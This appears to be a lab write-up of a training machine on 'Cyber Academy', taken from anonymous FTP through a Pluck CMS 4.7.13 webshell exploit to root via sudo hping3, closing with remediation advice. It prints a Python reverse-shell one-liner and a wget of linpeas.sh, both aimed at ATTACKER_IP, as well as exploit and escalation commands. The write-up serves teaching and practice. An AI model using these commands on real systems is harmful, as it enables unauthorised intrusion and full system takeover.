Platform: Cyber Academy (controlled lab environment)
Difficulty: Easy
OS: Linux
Anonymous FTP Login
→ Credential Disclosure (Creds.txt)
→ Pluck CMS Admin Panel Access
→ Remote Code Execution (CVE / 49909.py)
→ Webshell → Reverse Shell (www-data)
→ sudo -l → hping3 NOPASSWD
→ Root Shell (GTFOBins)
| Property | Value |
|---|---|
| IP | 192.168.x.x |
| OS | Linux |
| Open Ports | 21 (FTP), 22 (SSH), 80 (HTTP), 38080 (HTTP) |
| Web App | Pluck CMS 4.7.13 |
| FTP | vsftpd 3.0.3 |
Tool: nmap
nmap -p 21,22,80,38080 -A 192.168.x.xFindings:
- Port 21: vsftpd 3.0.3 — anonymous login enabled
- Port 38080: Pluck CMS 4.7.13 running on HTTP
- Port 22: SSH open (not used in this chain)
📸 screenshots/nmap_scan.png
Tool: ftp
Anonymous FTP login was permitted without credentials.
ftp 192.168.x.x
# Login: anonymous / (blank)
ls
wget "Creds.txt"
cat Creds.txtFinding: A plaintext file Creds.txt was publicly accessible, containing valid credentials for the Pluck CMS admin panel.
📸 screenshots/ftp_anonymous.png
📸 screenshots/creds_txt.png
Vulnerability: Anonymous FTP enabled + sensitive file exposed without access control.
Tool: searchsploit, 49909.py
searchsploit pluck 4.7.13
searchsploit -m 49909.py
python3 49909.py 192.168.x.x 38080 "VeryVerySecurePass" /Pluck CMS 4.7.13 contains an authenticated file upload vulnerability that allows uploading a PHP webshell through the admin panel.
Using credentials obtained from FTP, the exploit authenticated to the panel and uploaded a webshell (p0wny-shell).
📸 screenshots/pluck_panel.png
📸 screenshots/webshell.png
Exploit file: exploits/49909.py
From the webshell, a reverse shell was established back to the attacker machine:
# On attacker machine
nc -lvnp 4444
# In webshell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
# Upgrade to stable TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'Shell obtained as www-data.
📸 screenshots/reverse_shell.png
Tool: linpeas.sh, GTFOBins
LinPEAS was used to enumerate the system for privilege escalation vectors.
# On attacker machine — serve linpeas
python3 -m http.server 80
# On target
cd /tmp
wget http://ATTACKER_IP/linpeas.sh
chmod +x linpeas.sh
./linpeas.shLinPEAS flagged a critical sudo misconfiguration. Manual verification:
sudo -lOutput:
User www-data may run the following commands on pucuk:
(ALL) NOPASSWD: /usr/sbin/hping3
📸 screenshots/linpeas.png
hping3 is a network tool with an interactive mode that allows arbitrary command execution. Since it can be run as root without a password, it becomes a direct privilege escalation vector.
Reference: GTFOBins — hping3
sudo hping3
# Inside hping3 interactive shell:
/bin/bash📸 screenshots/hping3.png
📸 screenshots/root.png
| Vulnerability | Severity | Description |
|---|---|---|
| Anonymous FTP + exposed credentials | High | Creds.txt readable without authentication |
| Pluck CMS 4.7.13 Authenticated RCE | High | File upload leads to remote code execution |
| Sudo misconfiguration (hping3 NOPASSWD) | Critical | www-data can execute hping3 as root |
- Disable anonymous FTP or ensure no sensitive files are stored in accessible directories
- Update Pluck CMS to a patched version; restrict file upload types
- Audit sudoers configuration — remove unnecessary NOPASSWD entries, especially for binaries listed on GTFOBins
- Apply principle of least privilege to all service accounts
| Tool | Purpose |
|---|---|
| nmap | Port and service enumeration |
| ftp | Anonymous FTP access |
| searchsploit | Exploit discovery |
| 49909.py | Pluck CMS RCE exploit |
| linpeas.sh | Privilege escalation enumeration |
| GTFOBins | hping3 sudo privesc reference |
Disclaimer: This lab was conducted in a controlled environment provided by Cyber Academy. All techniques documented here are for educational purposes only.